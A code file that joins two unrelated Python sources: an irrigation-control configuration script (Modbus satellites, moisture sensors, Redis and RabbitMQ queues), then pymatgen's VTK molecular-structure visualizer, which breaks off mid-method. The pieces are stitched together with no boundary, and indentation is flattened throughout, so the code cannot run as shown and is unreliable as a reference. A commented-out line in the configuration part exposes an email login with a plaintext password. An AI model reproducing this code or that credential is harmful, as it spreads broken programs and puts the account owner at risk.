properties["modbus_remote"] = "skip_controller"
properties["parameters"] = []
properties["m_tag"] = "no_controller"
properties["init_tag"] = ["clear_daily_modbus_statistics"]
properties["exec_tag"] = ["accumulate_daily_modbus_statistics"]
cf.add_info_node( "HOUR_ELEMENT","MODBUS_STATISTICS",properties=properties,json_flag=True )
cf.end_header_node("HOUR_ACQUISTION") # HOUR_ACQUISTION
cf.add_header_node( "DAILY_ACQUISTION", properties= {"measurement":"DAILY_LIST_STORE","length":300, "routing_key":"DAILY_ACQUISTION"}, json_flag=True )
properties = {}
properties["modbus_remote"] = "skip_controller"
properties["parameters"] = []
properties["m_tag"] = "no_controller"
properties["exec_tag"] = ["log_daily_modbus_statistics"]
cf.add_info_node( "DAILY_ELEMENT","daily_modbus_statistics", properties=properties,json_flag=True )
cf.end_header_node("DAILY_ACQUISTION") # Daily Acquistion
cf.end_header_node("DATA_ACQUISITION") #DATA_ACQUISITION
cf.add_header_node( "LINUX_DATA_ACQUISITION")
cf.add_header_node( "LINUX_HOUR_ACQUISTION",properties= {"measurement":"LINUX_HOUR_LIST_STORE","length":300 , "routing_key":"linux_hour_measurement"
} , json_flag=True )
properties = {}
properties["modbus_remote"] = "skip_controller"
properties["parameters"] = []
properties["m_tag"] = "no_controller"
properties["exec_tag"] = ["linux_memory_load"]
cf.add_info_node( "LINUX_HOUR_ELEMENT","linux_memory_load",properties=properties,json_flag=True )
properties = {}
properties["modbus_remote"] = "skip_controller"
properties["parameters"] = []
properties["m_tag"] = "no_controller"
properties["exec_tag"] = ["pi_temperature"]
cf.add_info_node( "LINUX_HOUR_ELEMENT","pi_temperature_hourly",properties=properties,json_flag=True )
cf.end_header_node( "LINUX_HOUR_ACQUISTION") # HOUR_ACQUISTION
cf.add_header_node( "LINUX_DAILY_ACQUISTION", properties= {"measurement":"LINUX_DAILY_LIST_STORE","length":300, "routing_key":"linux_daily_measurement"}, json_flag=True )
properties = {}
properties["modbus_remote"] = "skip_controller"
properties["parameters"] = []
properties["m_tag"] = "no_controller"
properties["exec_tag"] = ["linux_daily_disk"]
cf.add_info_node( "LINUX_DAILY_ELEMENT","linux_daily_disk", properties=properties,json_flag=True )
properties = {}
properties["modbus_remote"] = "skip_controller"
properties["parameters"] = []
properties["m_tag"] = "no_controller"
properties["exec_tag"] = ["linux_daily_redis"]
cf.add_info_node( "LINUX_DAILY_ELEMENT","linux_daily_redis", properties=properties,json_flag=True )
properties = {}
properties["modbus_remote"] = "skip_controller"
properties["parameters"] = []
properties["m_tag"] = "no_controller"
properties["exec_tag"] = ["linux_daily_memory"]
cf.add_info_node( "LINUX_DAILY_ELEMENT","linux_daily_memory", properties=properties,json_flag=True )
cf.end_header_node("LINUX_DAILY_ACQUISTION") # Daily Acquistion
cf.end_header_node("LINUX_DATA_ACQUISITION")
#cf.add_info_node( "MINUTE_LIST_STORE", "MINUTE_LIST_STORE",properties = { "LIST_LENGTH" :10000} , json_flag = True) # about 1 week of data
#cf.add_info_node( "HOUR_LIST_STORE", "HOUR_LIST_STORE",properties = { "LIST_LENGTH" :10000} , json_flag = True) # about 1 week of data
cf.add_header_node("RAIN_MEASUREMENTS")
cf.add_info_node("RAIN_STORE","CIMIS_RAIN_STORE",properties={"list_length":300},json_flag = True)
cf.add_info_node("RAIN_STORE","SRCU1_RAIN_STORE",properties={"list_length":300},json_flag = True)
cf.end_header_node("RAIN_MEASUREMENTS")
cf.add_info_node("INTEGRATED_RAIN_ESTIMATE","LACIMA_INTEGRATED_RAIN_ESTIMATE",properties={},json_flag = True )
cf.add_info_node("INTEGRATED_ETO_ESTIMATE","LACIMA_INTEGRATED_ETO_ESTIMATE",properties={"list_length":300},json_flag = True )
cf.add_header_node("ETO_MEASUREMENTS")
cf.add_info_node("ETO_STORE","CIMIS_SATELLITE_ETO_STORE",properties={"list_length":300},json_flag = True)
cf.add_info_node("ETO_STORE","CIMIS_ETO_STORE",properties={"list_length":300},json_flag = True)
cf.add_info_node("ETO_STORE","SRUC1_ETO_STORE",properties={"list_length":300},json_flag = True)
cf.add_info_node("ETO_STORE","HYBRID_SITE_STORE",properties={"list_length":300},json_flag = True)
cf.end_header_node("ETO_MEASUREMENTS")
cf.add_header_node("MOISTURE_SENSOR_DATA")
cf.add_header_node("moisture_1")
cf.add_info_node("MOISTURE_DATA", "moisture_1",properties={"queue_name":"moisture_1_data","list_length":300},json_flag = True)
cf.add_info_node("MOISTURE_AIR_TEMP_LIST", "moisture_1",properties={"queue_name":"moisture_1_list","list_length":24},json_flag = True)
cf.add_info_node("MOISTURE_ROLLOVER", "moisture_1",properties={"queue_name":"moisture_1_rollover","list_length":24},json_flag = True)
cf.end_header_node("moisture_1") #moisture_1
cf.end_header_node("MOISTURE_SENSOR_DATA") #MOISTURE_DATA
cf.end_header_node("DATA_STORE")
properties = {}
properties["ip"] = "192.168.1.84"
properties["remote_type"] = "UDP"
properties["port"] = 5005
properties["redis_host"] = "192.168.1.84"
properties["redis_db"] = 0
cf.add_header_node( "UDP_IO_SERVER","main_remote", properties = properties, json_flag= True )
properties = {}
properties["type"] = "rs485_modbus",
properties["interface_parameters"] = { "interface":None, "timeout":.05, "baud_rate":38400 }
properties["search_device"] = "satellite_1"
cf.add_header_node( "SERIAL_LINK","rtu_2", properties = properties, json_flag= True )
properties = {}
properties["modbus_address"] = 100
properties["type"] = "click_44"
properties["function"] = ["irrigation","flow_meter","plc_current","valve_current","switches"]
properties["parameters"] = { "address":100 , "search_register":0, "register_number":1 }
cf.add_info_node( "REMOTE_UNIT","satellite_1", properties = properties, json_flag= True )
properties = {}
properties["modbus_address"] = 125
properties["type"] = "click_22"
properties["function"] = ["irrigation"]
properties["parameters"] = { "address":125 , "search_register":0 ,"register_number":1 }
cf.add_info_node( "REMOTE_UNIT","satellite_2", properties = properties, json_flag= True )
properties = {}
properties["modbus_address"] = 170
properties["type"] = "click_22"
properties["function"] = ["irrigation"]
properties["parameters"] = { "address":170 , "search_register":0, "register_number":1 }
cf.add_info_node( "REMOTE_UNIT","satellite_3", properties =properties, json_flag= True )
properties = {}
properties["modbus_address"] = 40
properties["type"] = "PSOC_4_Moisture"
properties["function"] = ["moisture"]
properties["parameters"] = { "address":40 , "search_register":1,"register_number":10 }
cf.add_info_node( "REMOTE_UNIT","moisture_1", properties =properties, json_flag= True )
cf.end_header_node("SERIAL_LINK")
cf.end_header_node("UDP_IO_SERVER")
cf.add_header_node("RABBITMQ_CLIENTS")
cf.add_rabbitmq_status_queue( "LaCima",vhost="LaCima",queue="status_queue",port=5671,server = 'lacimaRanch.cloudapp.net' )
cf.end_header_node("RABBITMQ_CLIENTS")
#cf.construct_controller( name="PI_1", ip = "192.168.1.82",type="PI")
#cf.end_controller()
#cf.construct_web_server( name="main_web_server",url="https://192.168.1.84" )
#cf.add_rabbitmq_command_rpc_queue("LaCima" )
#cf.add_rabbitmq_web_rpc_queue("LaCima")
#cf.add_rabbitmq_event_queue("LaCima")
#cf.add_rabbitmq_status_queue( "LaCima",vhost="LaCima",queue="status_queue",port=5671,server = 'lacimaRanch.cloudapp.net' )
#cf.add_info_node( "CIMIS_EMAIL","CIMIS_EMAIL",properties = { "imap_username" :'lacima.ranch@gmail.com',"imap_password" : 'Gr1234gfd'} , json_flag = True)
#cf.add_ntpd_server("LaCima") #cf.add_moisture_monitoring("LaCima")
#cf.irrigation_monitoring("LaCima")
#cf.add_device_monitoring("LaCima")
#cf.add_watch_dog_monitoring("LaCima")
cf.end_site()
cf.end_system()
cf.check_namespace()
#
# Test code
#
#
#
#
keys = redis_handle.keys("*")
print ("len of keys",len(keys))
'''
for i in keys:
print( "+++++++++++++:")
print( i )
temp = i.split( common.sep)
print (len(temp))
print (redis_handle.hgetall(i))
print ("----------------")
print ("lenght",len(keys))
print ("testing query functions")
'''
#temp = qc.match_label_property( "REMOTE", "name", "satellite_1")
#print "specific_match",len(temp),"UDP_IO_SERVER","main_remote"
temp = qc.match_label_property( "UDP_IO_SERVER", "name", "main_remote")
print ("specific_match",len(temp),temp)
temp = qc.match_label_property_generic( "UDP_IO_SERVER", "name", "main_remote", "REMOTE_UNIT" )
print ("general match", len(temp) ,temp)
print (qc.match_labels( "UDP_IO_SERVER"))
temp= qc.match_label_property_specific( "UDP_IO_SERVER", "name", "main_remote", "REMOTE_UNIT", "name", "satellite_1")
print ("specific property match", len(temp))
temp = qc.match_label_property_generic( "UDP_IO_SERVER", "name", "main_remote", "REMOTE_UNIT" )
print ("general match", len(temp))
temp= qc.match_relationship_property_specific( "UDP_IO_SERVER", "name", "main_remote", "REMOTE_UNIT", "name", "satellite_1")
print ("match relationship", len(temp))
temp = qc.match_relationship_property_generic( "UDP_IO_SERVER", "name", "main_remote", "REMOTE_UNIT" )
print ("general match", len(temp))
temp = qc.match_label_property_generic( "UDP_IO_SERVER", "name", "main_remote", "REMOTE_UNIT" )
print ("general match", len(temp) ,temp)
print ("testing class functions")
graph_management = Graph_Management("PI_1","main_remote","LaCima_DataStore" )
print (len(graph_management.find_remotes_by_function( "moisture" )))
print (len(graph_management.find_remotes_by_function( "irrigation" )))
print (len(graph_management.find_remotes_by_function( "flow_meter" )))
print (len(graph_management.find_remotes_by_function( "plc_current" )))
print (len(graph_management.find_remotes_by_function( "valve_current" )))
print (len(graph_management.find_remotes_by_function( "switches" )))
print (len(graph_management.find_remotes_by_function( "not found" )))
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
"""
This module contains classes to wrap Python VTK to make nice molecular plots.
"""
import itertools
import math
import os
import subprocess
import time
import numpy as np
try:
import vtk
from vtk import vtkInteractorStyleTrackballCamera
except ImportError:
    # VTK not present. vtkInteractorStyleTrackballCamera is set to object so
    # that the class definitions below do not error out in unittests.
vtk = None
vtkInteractorStyleTrackballCamera = object
from monty.dev import requires
from monty.serialization import loadfn
from pymatgen.core.periodic_table import Species
from pymatgen.core.sites import PeriodicSite
from pymatgen.core.structure import Structure
from pymatgen.util.coord import in_coord_list
module_dir = os.path.dirname(os.path.abspath(__file__))
EL_COLORS = loadfn(os.path.join(module_dir, "ElementColorSchemes.yaml"))
class StructureVis:
"""
Provides Structure object visualization using VTK.
"""
@requires(vtk, "Visualization requires the installation of VTK with Python bindings.")
def __init__(
self,
element_color_mapping=None,
show_unit_cell=True,
show_bonds=False,
show_polyhedron=True,
poly_radii_tol_factor=0.5,
excluded_bonding_elements=None,
):
"""
Constructs a Structure Visualization.
Args:
element_color_mapping: Optional color mapping for the elements,
as a dict of {symbol: rgb tuple}. For example, {"Fe": (255,
123,0), ....} If None is specified, a default based on
Jmol"s color scheme is used.
show_unit_cell: Set to False to not show the unit cell
boundaries. Defaults to True.
            show_bonds: Set to True to show bonds. Defaults to False.
            show_polyhedron: Set to True to show polyhedrons. Defaults to
                True.
poly_radii_tol_factor: The polyhedron and bonding code uses the
ionic radii of the elements or species to determine if two
atoms are bonded. This specifies a tolerance scaling factor
such that atoms which are (1 + poly_radii_tol_factor) * sum
of ionic radii apart are still considered as bonded.
excluded_bonding_elements: List of atom types to exclude from
bonding determination. Defaults to an empty list. Useful
when trying to visualize a certain atom type in the
framework (e.g., Li in a Li-ion battery cathode material).
Useful keyboard shortcuts implemented.
h : Show help
A/a : Increase/decrease cell by one unit vector in a-direction
B/b : Increase/decrease cell by one unit vector in b-direction
C/c : Increase/decrease cell by one unit vector in c-direction
# : Toggle showing of polyhedrons
- : Toggle showing of bonds
[ : Decrease poly_radii_tol_factor by 0.05
] : Increase poly_radii_tol_factor by 0.05
r : Reset camera direction
o : Orthogonalize structure
Up/Down : Rotate view along Up direction by 90 clock/anticlockwise
Left/right : Rotate view along camera direction by 90
clock/anticlockwise
"""
# create a rendering window and renderer
self.ren = vtk.vtkRenderer()
self.ren_win = vtk.vtkRenderWindow()
self.ren_win.AddRenderer(self.ren)
self.ren.SetBackground(1, 1, 1)
self.title = "Structure Visualizer"
# create a renderwindowinteractor
self.iren = vtk.vtkRenderWindowInteractor()
self.iren.SetRenderWindow(self.ren_win)
self.mapper_map = {}
self.structure = None
if element_color_mapping:
self.el_color_mapping = element_color_mapping
else:
self.el_color_mapping = EL_COLORS["VESTA"]
self.show_unit_cell = show_unit_cell
self.show_bonds = show_bonds
self.show_polyhedron = show_polyhedron
self.poly_radii_tol_factor = poly_radii_tol_factor
self.excluded_bonding_elements = excluded_bonding_elements if excluded_bonding_elements else []
self.show_help = True
self.supercell = [[1, 0, 0], [0, 1, 0], [0, 0, 1]]
self.redraw()
style = StructureInteractorStyle(self)
self.iren.SetInteractorStyle(style)
self.ren.parent = self
def rotate_view(self, axis_ind=0, angle=0):
"""
Rotate the camera view.
Args:
axis_ind: Index of axis to rotate. Defaults to 0, i.e., a-axis.
angle: Angle to rotate by. Defaults to 0.
"""
camera = self.ren.GetActiveCamera()
if axis_ind == 0:
camera.Roll(angle)
elif axis_ind == 1:
camera.Azimuth(angle)
else:
camera.Pitch(angle)
self.ren_win.Render()
def write_image(self, filename="image.png", magnification=1, image_format="png"):
"""
Save render window to an image.
Arguments:
filename:
filename to save to. Defaults to image.png.
magnification:
magnification. Use it to render high res images.
image_format:
choose between jpeg, png. Png is the default.
"""
render_large = vtk.vtkRenderLargeImage()
render_large.SetInput(self.ren)
if image_format == "jpeg":
writer = vtk.vtkJPEGWriter()
writer.SetQuality(80)
else:
writer = vtk.vtkPNGWriter()
render_large.SetMagnification(magnification)
writer.SetFileName(filename)
writer.SetInputConnection(render_large.GetOutputPort())
self.ren_win.Render()
writer.Write()
del render_large
def redraw(self, reset_camera=False):
"""
Redraw the render window.
Args:
reset_camera: Set to True to reset the camera to a
pre-determined default for each structure. Defaults to False.
"""
self.ren.RemoveAllViewProps()
self.picker = None
self.add_picker_fixed()
self.helptxt_mapper = vtk.vtkTextMapper()
tprops = self.helptxt_mapper.GetTextProperty()
tprops.SetFontSize(14)
tprops.SetFontFamilyToTimes()
tprops.SetColor(0, 0, 0)
if self.structure is not None:
self.set_structure(self.structure, reset_camera)
self.ren_win.Render()
def orthongonalize_structure(self):
"""
Orthogonalize the structure.
"""
if self.structure is not None:
self.set_structure(self.structure.copy(sanitize=True))
self.ren_win.Render()
def display_help(self):
"""
Display the help for various keyboard shortcuts.
"""
helptxt = [
"h : Toggle help",
"A/a, B/b or C/c : Increase/decrease cell by one a, b or c unit vector",
"# : Toggle showing of polyhedrons",
"-: Toggle showing of bonds",
"r : Reset camera direction",
"[/]: Decrease or increase poly_radii_tol_factor by 0.05. Value = " + str(self.poly_radii_tol_factor),
"Up/Down: Rotate view along Up direction by 90 clockwise/anticlockwise",
"Left/right: Rotate view along camera direction by 90 clockwise/anticlockwise",
"s: Save view to image.png",
"o: Orthogonalize structure",
]
self.helptxt_mapper.SetInput("\n".join(helptxt))
self.helptxt_actor.SetPosition(10, 10)
self.helptxt_actor.VisibilityOn()
def set_structure(self, structure, reset_camera=True, to_unit_cell=True):
"""
Add a structure to the visualizer.
Args:
structure: structure to visualize
reset_camera: Set to True to reset the camera to a default
determined based on the structure.
            to_unit_cell: Whether or not to map sites back into the unit cell.
"""
self.ren.RemoveAllViewProps()
has_lattice = hasattr(structure, "lattice")
if has_lattice:
s = Structure.from_sites(structure, to_unit_cell=to_unit_cell)
s.make_supercell(self.supercell, to_unit_cell=to_unit_cell)
else:
s = structure
inc_coords = []
for site in s:
self.add_site(site)
inc_coords.append(site.coords)
count = 0
labels = ["a", "b", "c"]
colors = [(1, 0, 0), (0, 1, 0), (0, 0, 1)]
if has_lattice:
matrix = s.lattice.matrix
if self.show_unit_cell and has_lattice:
# matrix = s.lattice.matrix
self.add_text([0, 0, 0], "o")
for vec in matrix:
self.add_line((0, 0, 0), vec, colors[count])
self.add_text(vec, labels[count], colors[count])
count += 1
for (vec1, vec2) in itertools.permutations(matrix, 2):
self.add_line(vec1, vec1 + vec2)
for (vec1, vec2, vec3) in itertools.permutations(matrix, 3):
self.add_line(vec1 + vec2, vec1 + vec2 + vec3)
if self.show_bonds or self.show_polyhedron:
elements = sorted(s.composition.elements, key=lambda a: a.X)
anion = elements[-1]
def contains_anion(site):
for sp in site.species.keys():
if sp.symbol == anion.symbol:
return True
return False
anion_radius = anion.average_ionic_radius
for site in s:
exclude = False
max_radius = 0
color = np.array([0, 0, 0])
for sp, occu in site.species.items():
if sp.symbol in self.excluded_bonding_elements or sp == anion:
exclude = True
break
max_radius = max(max_radius, sp.average_ionic_radius)
color = color + occu * np.array(self.el_color_mapping.get(sp.symbol, [0, 0, 0]))
if not exclude:
max_radius = (1 + self.poly_radii_tol_factor) * (max_radius + anion_radius)
nn = structure.get_neighbors(site, float(max_radius))
nn_sites = []
for neighbor in nn:
if contains_anion(neighbor):
nn_sites.append(neighbor)
if not in_coord_list(inc_coords, neighbor.coords):
self.add_site(neighbor)
if self.show_bonds:
self.add_bonds(nn_sites, site)
if self.show_polyhedron:
color = [i / 255 for i in color]
self.add_polyhedron(nn_sites, site, color)
if self.show_help:
self.helptxt_actor = vtk.vtkActor2D()
self.helptxt_actor.VisibilityOn()
self.helptxt_actor.SetMapper(self.helptxt_mapper)
self.ren.AddActor(self.helptxt_actor)
self.display_help()
camera = self.ren.GetActiveCamera()
if reset_camera:
if has_lattice:
# Adjust the camera for best viewing
lengths = s.lattice.abc
pos = (matrix[1] + matrix[2]) * 0.5 + matrix[0] * max(lengths) / lengths[0] * 3.5
camera.SetPosition(pos)
camera.SetViewUp(matrix[2])
camera.SetFocalPoint((matrix[0] + matrix[1] + matrix[2]) * 0.5)
else:
origin = s.center_of_mass
max_site = max(s, key=lambda site: site.distance_from_point(origin))
camera.SetPosition(origin + 5 * (max_site.coords - origin))
camera.SetFocalPoint(s.center_of_mass)
self.structure = structure
self.title = s.composition.formula
def zoom(self, factor):
"""
Zoom the camera view by a factor.
"""
camera = self.ren.GetActiveCamera()
camera.Zoom(factor)
self.ren_win.Render()
def show(self):
"""
Display the visualizer.
"""
self.iren.Initialize()
self.ren_win.SetSize(800, 800)
self.ren_win.SetWindowName(self.title)
self.ren_win.Render()
self.iren.Start()
def add_site(self, site):
"""
Add a site to the render window. The site is displayed as a sphere, the
color of which is determined based on the element. Partially occupied
sites are displayed as a single element color, though the site info
still shows the partial occupancy.
Args:
site: Site to add.
"""
start_angle = 0
radius = 0
total_occu = 0
for specie, occu in site.species.items():
radius += occu * (
specie.ionic_radius
if isinstance(specie, Species) and specie.ionic_radius
else specie.average_ionic_radius
)
total_occu += occu
vis_radius = 0.2 + 0.002 * radius
for specie, occu in site.species.items():
if not specie:
color = (1, 1, 1)
            elif specie.symbol in self.el_color_mapping:
                color = [i / 255 for i in self.el_color_mapping[specie.symbol]]
            else:
                # Fall back to white for species without a mapped color.
                color = (1, 1, 1)
mapper = self.add_partial_sphere(site.coords, vis_radius, color, start_angle, start_angle + 360 * occu)
self.mapper_map[mapper] = [site]
start_angle += 360 * occu
if total_occu < 1:
mapper = self.add_partial_sphere(
site.coords,
vis_radius,
(1, 1, 1),
start_angle,
start_angle + 360 * (1 - total_occu),
)
self.mapper_map[mapper] = [site]
def add_partial_sphere(self, coords, radius, color, start=0, end=360, opacity=1.0):
"""
        Add a partial sphere (used to display partial occupancies).
Args:
coords (nd.array): Coordinates
radius (float): Radius of sphere
color (): Color of sphere.
start (float): Starting angle.
end (float): Ending angle.
opacity (float): Opacity.
"""
sphere = vtk.vtkSphereSource()
sphere.SetCenter(coords)
sphere.SetRadius(radius)
sphere.SetThetaResolution(18)
sphere.SetPhiResolution(18)
sphere.SetStartTheta(start)
sphere.SetEndTheta(end)
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(sphere.GetOutputPort())
actor = vtk.vtkActor()
actor.SetMapper(mapper)
actor.GetProperty().SetColor(color)
actor.GetProperty().SetOpacity(opacity)
self.ren.AddActor(actor)
return mapper
def add_text(self, coords, text, color=(0, 0, 0)):
"""
Add text at a coordinate.
Args:
coords: Coordinates to add text at.
text: Text to place.
color: Color for text as RGB. Defaults to black.
"""
source = vtk.vtkVectorText()
source.SetText(text)
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(source.GetOutputPort())
follower = vtk.vtkFollower()
follower.SetMapper(mapper)
follower.GetProperty().SetColor(color)
follower.SetPosition(coords)
follower.SetScale(0.5)
self.ren.AddActor(follower)
follower.SetCamera(self.ren.GetActiveCamera())
def add_line(self, start, end, color=(0.5, 0.5, 0.5), width=1):
"""
Adds a line.
Args:
start: Starting coordinates for line.
end: Ending coordinates for line.
color: Color for text as RGB. Defaults to grey.
width: Width of line. Defaults to 1.
"""
source = vtk.vtkLineSource()
source.SetPoint1(start)
source.SetPoint2(end)
vertexIDs = vtk.vtkStringArray()
vertexIDs.SetNumberOfComponents(1)
vertexIDs.SetName("VertexIDs")
# Set the vertex labels
vertexIDs.InsertNextValue("a")
vertexIDs.InsertNextValue("b")
source.GetOutput().GetPointData().AddArray(vertexIDs)
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(source.GetOutputPort())
actor = vtk.vtkActor()
actor.SetMapper(mapper)
actor.GetProperty().SetColor(color)
actor.GetProperty().SetLineWidth(width)
self.ren.AddActor(actor)
def add_polyhedron(
self,
neighbors,
center,
color,
opacity=1.0,
draw_edges=False,
edges_color=[0.0, 0.0, 0.0],
edges_linewidth=2,
):
"""
Adds a polyhedron.
Args:
neighbors: Neighbors of the polyhedron (the vertices).
center: The atom in the center of the polyhedron.
color: Color for text as RGB.
opacity: Opacity of the polyhedron
            draw_edges: If set to True, a line will be drawn at each edge
edges_color: Color of the line for the edges
edges_linewidth: Width of the line drawn for the edges
"""
points = vtk.vtkPoints()
conv = vtk.vtkConvexPointSet()
for i, n in enumerate(neighbors):
x, y, z = n.coords
points.InsertPoint(i, x, y, z)
conv.GetPointIds().InsertId(i, i)
grid = vtk.vtkUnstructuredGrid()
grid.Allocate(1, 1)
grid.InsertNextCell(conv.GetCellType(), conv.GetPointIds())
grid.SetPoints(points)
dsm = vtk.vtkDataSetMapper()
polysites = [center]
polysites.extend(neighbors)
self.mapper_map[dsm] = polysites
if vtk.VTK_MAJOR_VERSION <= 5:
dsm.SetInputConnection(grid.GetProducerPort())
else:
dsm.SetInputData(grid)
ac = vtk.vtkActor()
# ac.SetMapper(mapHull)
ac.SetMapper(dsm)
ac.GetProperty().SetOpacity(opacity)
if color == "element":
# If partial occupations are involved, the color of the specie with
# the highest occupation is used
myoccu = 0.0
for specie, occu in center.species.items():
if occu > myoccu:
myspecie = specie
myoccu = occu
color = [i / 255 for i in self.el_color_mapping[myspecie.symbol]]
ac.GetProperty().SetColor(color)
else:
ac.GetProperty().SetColor(color)
if draw_edges:
ac.GetProperty().SetEdgeColor(edges_color)
ac.GetProperty().SetLineWidth(edges_linewidth)
ac.GetProperty().EdgeVisibilityOn()
self.ren.AddActor(ac)
def add_triangle(
self,
neighbors,
color,
center=None,
opacity=0.4,
draw_edges=False,
edges_color=[0.0, 0.0, 0.0],
edges_linewidth=2,
):
"""
Adds a triangular surface between three atoms.
Args:
            neighbors: Atoms between which a triangle will be drawn.
color: Color for triangle as RGB.
center: The "central atom" of the triangle
opacity: opacity of the triangle
            draw_edges: If set to True, a line will be drawn at each edge
edges_color: Color of the line for the edges
edges_linewidth: Width of the line drawn for the edges
"""
points = vtk.vtkPoints()
triangle = vtk.vtkTriangle()
for ii in range(3):
points.InsertNextPoint(neighbors[ii].x, neighbors[ii].y, neighbors[ii].z)
triangle.GetPointIds().SetId(ii, ii)
triangles = vtk.vtkCellArray()
triangles.InsertNextCell(triangle)
# polydata object
trianglePolyData = vtk.vtkPolyData()
trianglePolyData.SetPoints(points)
trianglePolyData.SetPolys(triangles)
# mapper
mapper = vtk.vtkPolyDataMapper()
        if vtk.VTK_MAJOR_VERSION <= 5:
            mapper.SetInput(trianglePolyData)
        else:
            mapper.SetInputData(trianglePolyData)
ac = vtk.vtkActor()
ac.SetMapper(mapper)
ac.GetProperty().SetOpacity(opacity)
if color == "element":
if center is None:
raise ValueError(
"Color should be chosen according to the central atom, and central atom is not provided"
)
# If partial occupations are involved, the color of the specie with
# the highest occupation is used
myoccu = 0.0
for specie, occu in center.species.items():
if occu > myoccu:
myspecie = specie
myoccu = occu
color = [i / 255 for i in self.el_color_mapping[myspecie.symbol]]
ac.GetProperty().SetColor(color)
else:
ac.GetProperty().SetColor(color)
if draw_edges:
ac.GetProperty().SetEdgeColor(edges_color)
ac.GetProperty().SetLineWidth(edges_linewidth)
ac.GetProperty().EdgeVisibilityOn()
self.ren.AddActor(ac)
def add_faces(self, faces, color, opacity=0.35):
"""
        Add the faces of a polygon.
Args:
faces (): Coordinates of the faces.
color (): Color.
opacity (float): Opacity
"""
for face in faces:
if len(face) == 3:
points = vtk.vtkPoints()
triangle = vtk.vtkTriangle()
for ii in range(3):
points.InsertNextPoint(face[ii][0], face[ii][1], face[ii][2])
triangle.GetPointIds().SetId(ii, ii)
triangles = vtk.vtkCellArray()
triangles.InsertNextCell(triangle)
trianglePolyData = vtk.vtkPolyData()
trianglePolyData.SetPoints(points)
trianglePolyData.SetPolys(triangles)
mapper = vtk.vtkPolyDataMapper()
if vtk.VTK_MAJOR_VERSION <= 5:
mapper.SetInputConnection(trianglePolyData.GetProducerPort())
else:
mapper.SetInputData(trianglePolyData)
# mapper.SetInput(trianglePolyData)
ac = vtk.vtkActor()
ac.SetMapper(mapper)
ac.GetProperty().SetOpacity(opacity)
ac.GetProperty().SetColor(color)
self.ren.AddActor(ac)
elif len(face) > 3:
center = np.zeros(3, np.float_)
for site in face:
center += site
center /= np.float_(len(face))
for ii, f in enumerate(face):
points = vtk.vtkPoints()
triangle = vtk.vtkTriangle()
points.InsertNextPoint(f[0], f[1], f[2])
ii2 = np.mod(ii + 1, len(face))
points.InsertNextPoint(face[ii2][0], face[ii2][1], face[ii2][2])
points.InsertNextPoint(center[0], center[1], center[2])
for ii in range(3):
triangle.GetPointIds().SetId(ii, ii)
triangles = vtk.vtkCellArray()
triangles.InsertNextCell(triangle)
trianglePolyData = vtk.vtkPolyData()
trianglePolyData.SetPoints(points)
trianglePolyData.SetPolys(triangles)
mapper = vtk.vtkPolyDataMapper()
if vtk.VTK_MAJOR_VERSION <= 5:
mapper.SetInputConnection(trianglePolyData.GetProducerPort())
else:
mapper.SetInputData(trianglePolyData)
# mapper.SetInput(trianglePolyData)
ac = vtk.vtkActor()
ac.SetMapper(mapper)
ac.GetProperty().SetOpacity(opacity)
ac.GetProperty().SetColor(color)
self.ren.AddActor(ac)
else:
raise ValueError("Number of points for a face should be >= 3")
def add_edges(self, edges, type="line", linewidth=2, color=[0.0, 0.0, 0.0]):
"""
Args:
edges (): List of edges
type ():
linewidth (): Width of line
color (nd.array/tuple): RGB color.
"""
points = vtk.vtkPoints()
lines = vtk.vtkCellArray()
for iedge, edge in enumerate(edges):
points.InsertPoint(2 * iedge, edge[0])
points.InsertPoint(2 * iedge + 1, edge[1])
lines.InsertNextCell(2)
lines.InsertCellPoint(2 * iedge)
lines.InsertCellPoint(2 * iedge + 1)
polydata = vtk.vtkPolyData()
polydata.SetPoints(points)
polydata.SetLines(lines)
mapper = vtk.vtkPolyDataMapper()
if vtk.VTK_MAJOR_VERSION <= 5:
mapper.SetInputConnection(polydata.GetProducerPort())
else:
mapper.SetInputData(polydata)
# mapper.SetInput(polydata)
ac = vtk.vtkActor()
ac.SetMapper(mapper)
ac.GetProperty().SetColor(color)
ac.GetProperty().SetLineWidth(linewidth)
self.ren.AddActor(ac)
def add_bonds(self, neighbors, center, color=None, opacity=None, radius=0.1):
"""
Adds bonds for a site.
Args:
neighbors: Neighbors of the site.
center: The site in the center for all bonds.
color: Color of the tubes representing the bonds
opacity: Opacity of the tubes representing the bonds
            radius: Radius of the tubes representing the bonds
"""
points = vtk.vtkPoints()
points.InsertPoint(0, center.x, center.y, center.z)
n = len(neighbors)
lines = vtk.vtkCellArray()
for i in range(n):
points.InsertPoint(i + 1, neighbors[i].coords)
lines.InsertNextCell(2)
lines.InsertCellPoint(0)
lines.InsertCellPoint(i + 1)
pd = vtk.vtkPolyData()
pd.SetPoints(points)
pd.SetLines(lines)
tube = vtk.vtkTubeFilter()
if vtk.VTK_MAJOR_VERSION <= 5:
tube.SetInputConnection(pd.GetProducerPort())
else:
tube.SetInputData(pd)
tube.SetRadius(radius)
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(tube.GetOutputPort())
actor = vtk.vtkActor()
actor.SetMapper(mapper)
if opacity is not None:
actor.GetProperty().SetOpacity(opacity)
if color is not None:
actor.GetProperty().SetColor(color)
self.ren.AddActor(actor)
def add_picker_fixed(self):
"""
        Create a cell picker.
"""
picker = vtk.vtkCellPicker()
# Create a Python function to create the text for the text mapper used
# to display the results of picking.
def annotate_pick(obj, event):
if picker.GetCellId() < 0 and not self.show_help:
self.helptxt_actor.VisibilityOff()
else:
mapper = picker.GetMapper()
if mapper in self.mapper_map:
output = []
for site in self.mapper_map[mapper]:
row = [
f"{site.species_string} - ",
", ".join([f"{c:.3f}" for c in site.frac_coords]),
"[" + ", ".join([f"{c:.3f}" for c in site.coords]) + "]",
]
output.append("".join(row))
self.helptxt_mapper.SetInput("\n".join(output))
self.helptxt_actor.SetPosition(10, 10)
self.helptxt_actor.VisibilityOn()
self.show_help = False
self.picker = picker
picker.AddObserver("EndPickEvent", annotate_pick)
self.iren.SetPicker(picker)
def add_picker(self):
"""
Create a cell picker.
"""
picker = vtk.vtkCellPicker()
# Create a Python function to create the text for the text mapper used
# to display the results of picking.
source = vtk.vtkVectorText()
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(source.GetOutputPort())
follower = vtk.vtkFollower()
follower.SetMapper(mapper)
follower.GetProperty().SetColor((0, 0, 0))
follower.SetScale(0.2)
